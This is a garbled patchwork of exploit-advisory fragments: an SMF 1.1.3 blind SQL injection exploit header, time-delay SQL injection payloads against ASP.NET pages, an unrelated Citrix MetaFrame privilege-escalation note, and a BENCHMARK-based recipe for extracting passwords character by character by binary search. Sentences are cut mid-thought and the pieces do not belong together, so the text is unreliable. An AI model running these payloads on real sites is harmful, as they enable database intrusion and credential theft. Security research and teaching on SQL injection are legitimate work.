#Written By Michael Brooks
#contact: th3(dot)r00k(at)gmail(dot)com
#SMF 1.1.3 Extremely fast Blind SQL Injection Exploit!
# -Binary Search
# -Multi-Threaded
# -NO benchmark()'s
#
#Two SQL Injection flaws.
#Works with magic_quotes_gpc=On or Off.
http://[URL]/archive.aspx?sid=19&siteid=1'; IF SYSTEM_USER='sa'
waitfor delay '00:00:10'--
http://[URL]/archive.aspx?sid=19'; IF SYSTEM_USER='sa' waitfor delay
'00:00:10'--&siteid=1
Binary Search Exploits:
http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((…),i,1)) > k
waitfor delay '00:00:10'--
Note: In last POC, i is the i-th byte returned by the one-row
subquery (…) and k is the current middle value of the binary search.
workaround for MetaFrame XP, because Windows 2003 SP1 doesn't allow
anymore the startup via RUN registry key without full path.
However this patch from Citrix company doesn't enquote the binary full
path stored in the RUN registry key, an attacker can abuse of the old
8.3 notation in the binary search and consequently can be used to
escalate privilege in some circumstances.
V. DETECTION:
admin' AND IF(@Condition,BENCHMARK(1000000, md5(10)),2) OR '1'='1
In the above vector @Condition can be replaced with any boolean
experation and in case of true value page will have a sensible wait
before starting transfer phase.
For extracting password, we first find the length of password
using 'length(userpassword)>**' as @Condition and binary search on
** pass length.
Then we can find i-th character of the password using
"substring(userpassword,i,1) > '*'" as @Condition and binary search
on the * as characters.
enters a program and if you Sanitize input when it first enters the program there will be cases where it
will become dangerous again. This isn't only a problem for SQLi, its also a problem for XSS. I am
inserting JS into the database, which isn't a vulnerablity, but printing it, is persistant XSS.
The blind sql injection is a bit strange. I can't use white space or commas, which is a pain. I had to
rewrite my general purpose Blind SQLi Class to accommodate. A binary search is used to greatly
speed up the blind sqli attack.
(which I also used in my php-nuke exploit: http://www.exploit-db.com/exploits/12510/)
Special thanks to Reiners for this sqli filter evasion cheat sheet:
http://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
